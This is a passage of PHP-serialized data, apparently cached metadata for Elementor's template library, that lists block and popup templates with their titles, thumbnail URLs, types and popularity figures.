7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_1.png\";s:12:\"tmpl_created\";i:1520443623;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:501;s:11:\"trend_index\";i:551;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:42;a:14:{s:2:\"id\";i:10382;s:5:\"title\";s:35:\"Bottom Bar | Announcement | Cookies\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2019/01/bottom_pink_small.png\";s:12:\"tmpl_created\";i:1547916616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/popups/bottom-bar-announcement/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:284;s:11:\"trend_index\";i:136;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:43;a:14:{s:2:\"id\";i:5963;s:5:\"title\";s:10:\"Features 7\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_2.png\";s:12:\"tmpl_created\";i:1520443626;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:63;s:11:\"trend_index\";i:65;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:44;a:14:{s:2:\"id\";i:5974;s:5:\"title\";s:10:\"Features 4\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_3.png\";s:12:\"tmpl_created\";i:1520443629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:62;s:11:\"trend_index\";i:61;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:45;a:14:{s:2:\"id\";i:5983;s:5:\"title\";s:10:\"Features 3\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_3.png\";s:12:\"tmpl_created\";i:1520443630;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:11:\"[\"featues\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:235;s:11:\"trend_index\";i:258;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:46;a:14:{s:2:\"id\";i:5991;s:5:\"title\";s:11:\"Features 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_4.png\";s:12:\"tmpl_created\";i:1520443632;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:121;s:11:\"trend_index\";i:125;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:47;a:14:{s:2:\"id\";i:5999;s:5:\"title\";s:7:\"Team 14\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_black_10.png\";s:12:\"tmpl_created\";i:1520443634;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-14/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:87;s:11:\"trend_index\";i:101;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:48;a:14:{s:2:\"id\";i:10434;s:5:\"title\";s:27:\"Classic | Sale | Headphones\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2019/01/head_small.png\";s:12:\"tmpl_created\";i:1547961950;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:370;s:11:\"trend_index\";i:335;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:49;a:14:{s:2:\"id\";i:6008;s:5:\"title\";s:6:\"Team 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_10.png\";s:12:\"tmpl_created\";i:1520443636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/blocks/team-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:66;s:11:\"trend_index\";i:74;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:50;a:14:{s:2:\"id\";i:10444;s:5:\"title\";s:17:\"Classic | Contact\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/plant_small.png\";s:12:\"tmpl_created\";i:1547962029;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/popups/classic-contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:399;s:11:\"trend_index\";i:343;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:51;a:14:{s:2:\"id\";i:6027;s:5:\"title\";s:7:\"About 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1-1.png\";s:12:\"tmpl_created\";i:1520443639;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-5-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:39;s:11:\"trend_index\";i:28;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:52;a:14:{s:2:\"id\";i:6036;s:5:\"title\";s:7:\"About 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1-1.png\";s:12:\"tmpl_created\";i:1520443641;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/blocks/about-6-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:85;s:11:\"trend_index\";i:60;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:53;a:14:{s:2:\"id\";i:10467;s:5:\"title\";s:27:\"Bottom Bar | Contact | Lego\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/tro_small.png\";s:12:\"tmpl_created\";i:1547962277;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/bottom-bar-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:10:\"bottom bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:653;s:11:\"trend_index\";i:692;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:54;a:14:{s:2:\"id\";i:6044;s:5:\"title\";s:11:\"Features 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_5.png\";s:12:\"tmpl_created\";i:1520443643;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/features-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:65;s:11:\"trend_index\";i:73;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:55;a:14:{s:2:\"id\";i:6053;s:5:\"title\";s:10:\"Features 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_black_5.png\";s:12:\"tmpl_created\";i:1520443645;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:167;s:11:\"trend_index\";i:210;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:56;a:14:{s:2:\"id\";i:10487;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/acc_small.png\";s:12:\"tmpl_created\";i:1547964527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:518;s:11:\"trend_index\";i:544;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:57;a:14:{s:2:\"id\";i:6063;s:5:\"title\";s:7:\"Stats 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_2.png\";s:12:\"tmpl_created\";i:1520443647;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:159;s:11:\"trend_index\";i:209;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:58;a:14:{s:2:\"id\";i:10498;s:5:\"title\";s:14:\"Classic | Sale\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/pink_small-1.png\";s:12:\"tmpl_created\";i:1547964616;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/classic-sale-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:426;s:11:\"trend_index\";i:310;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:59;a:14:{s:2:\"id\";i:6071;s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";i:1520443649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-13/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:160;s:11:\"trend_index\";i:217;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:60;a:14:{s:2:\"id\";i:6079;s:5:\"title\";s:7:\"Stats 3\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_4.png\";s:12:\"tmpl_created\";i:1520443651;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:268;s:11:\"trend_index\";i:290;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:61;a:14:{s:2:\"id\";i:10519;s:5:\"title\";s:27:\"Hello Bar | Promotion | App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/app_small-1.png\";s:12:\"tmpl_created\";i:1547964801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/popups/hello-bar-promotion-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:546;s:11:\"trend_index\";i:535;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:62;a:14:{s:2:\"id\";i:6089;s:5:\"title\";s:7:\"Stats 4\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_5.png\";s:12:\"tmpl_created\";i:1520443653;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:180;s:11:\"trend_index\";i:200;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:63;a:14:{s:2:\"id\";i:6097;s:5:\"title\";s:7:\"Stats 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_2.png\";s:12:\"tmpl_created\";i:1520443655;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:262;s:11:\"trend_index\";i:256;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:64;a:14:{s:2:\"id\";i:6106;s:5:\"title\";s:7:\"Stats 2\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_6.png\";s:12:\"tmpl_created\";i:1520443657;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:333;s:11:\"trend_index\";i:531;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:65;a:14:{s:2:\"id\";i:6114;s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";i:1520443659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:371;s:11:\"trend_index\";i:458;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:66;a:14:{s:2:\"id\";i:6122;s:5:\"title\";s:7:\"About 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2-1.png\";s:12:\"tmpl_created\";i:1520443661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/about-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:36;s:11:\"trend_index\";i:45;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:67;a:14:{s:2:\"id\";i:10569;s:5:\"title\";s:15:\"Slide In | Sale\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2019/01/off_small.png\";s:12:\"tmpl_created\";i:1547967812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/popups/slide-in-sale/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:497;s:11:\"trend_index\";i:418;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:68;a:14:{s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/about-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:82;s:11:\"trend_index\";i:84;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:69;a:14:{s:2:\"id\";i:6144;s:5:\"title\";s:7:\"Team 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/team_white_11.png\";s:12:\"tmpl_created\";i:1520443664;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/team-17/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:4:\"team\";s:4:\"tags\";s:8:\"[\"team\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:155;s:11:\"trend_index\";i:249;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:70;a:14:{s:2:\"id\";i:10590;s:5:\"title\";s:19:\"Full Screen | Login\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/pass1_small.png\";s:12:\"tmpl_created\";i:1547967978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/popups/classic-login-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:473;s:11:\"trend_index\";i:455;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:71;a:14:{s:2:\"id\";i:6152;s:5:\"title\";s:7:\"Stats 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_1.png\";s:12:\"tmpl_created\";i:1520443666;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/blocks/stats-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:239;s:11:\"trend_index\";i:288;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:72;a:14:{s:2:\"id\";i:10600;s:5:\"title\";s:18:\"Slide In | Contact\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/orange_small.png\";s:12:\"tmpl_created\";i:1547968080;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/popups/slide-in-contact-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:463;s:11:\"trend_index\";i:539;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:73;a:14:{s:2:\"id\";i:6162;s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";i:1520443668;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/blocks/services-31/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:335;s:11:\"trend_index\";i:332;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:74;a:14:{s:2:\"id\";i:6170;s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";i:1520443670;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-11/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:326;s:11:\"trend_index\";i:480;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:75;a:14:{s:2:\"id\";i:10622;s:5:\"title\";s:34:\"Full Screen | Contact | Headphones\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2019/01/full_hear_small.png\";s:12:\"tmpl_created\";i:1547969678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/popups/full-screen-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:521;s:11:\"trend_index\";i:499;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:76;a:14:{s:2:\"id\";i:6178;s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";i:1520443676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:380;s:11:\"trend_index\";i:469;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:77;a:14:{s:2:\"id\";i:10633;s:5:\"title\";s:23:\"Slide In | Login | Lego\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/01/tro_small-1.png\";s:12:\"tmpl_created\";i:1547969858;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/popups/slide-in-login/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:612;s:11:\"trend_index\";i:505;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:78;a:14:{s:2:\"id\";i:6186;s:5:\"title\";s:8:\"Stats 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_3.png\";s:12:\"tmpl_created\";i:1520443678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/blocks/stats-12/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:481;s:11:\"trend_index\";i:653;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:79;a:14:{s:2:\"id\";i:10644;s:5:\"title\";s:26:\"Fly In | Contact | Webinar\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2019/01/blue_small-1.png\";s:12:\"tmpl_created\";i:1547970814;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/popups/fly-in-contact-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:461;s:11:\"trend_index\";i:470;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:80;a:14:{s:2:\"id\";i:6196;s:5:\"title\";s:10:\"Features 9\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/features_white_6.png\";s:12:\"tmpl_created\";i:1520443680;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:104;s:11:\"trend_index\";i:87;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:81;a:14:{s:2:\"id\";i:10654;s:5:\"title\";s:31:\"Full Screen | Login | Christmas\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/full_login_small.png\";s:12:\"tmpl_created\";i:1547970917;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/full-screen-login-christmas/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:608;s:11:\"trend_index\";i:515;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:1;}i:82;a:14:{s:2:\"id\";i:6204;s:5:\"title\";s:10:\"Features 8\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_6.png\";s:12:\"tmpl_created\";i:1520443681;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/blocks/features-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"features\";s:4:\"tags\";s:12:\"[\"features\"]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:215;s:11:\"trend_index\";i:213;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}i:83;a:14:{s:2:\"id\";i:10664;s:5:\"title\";s:34:\"Slide In | Contact | Gym | 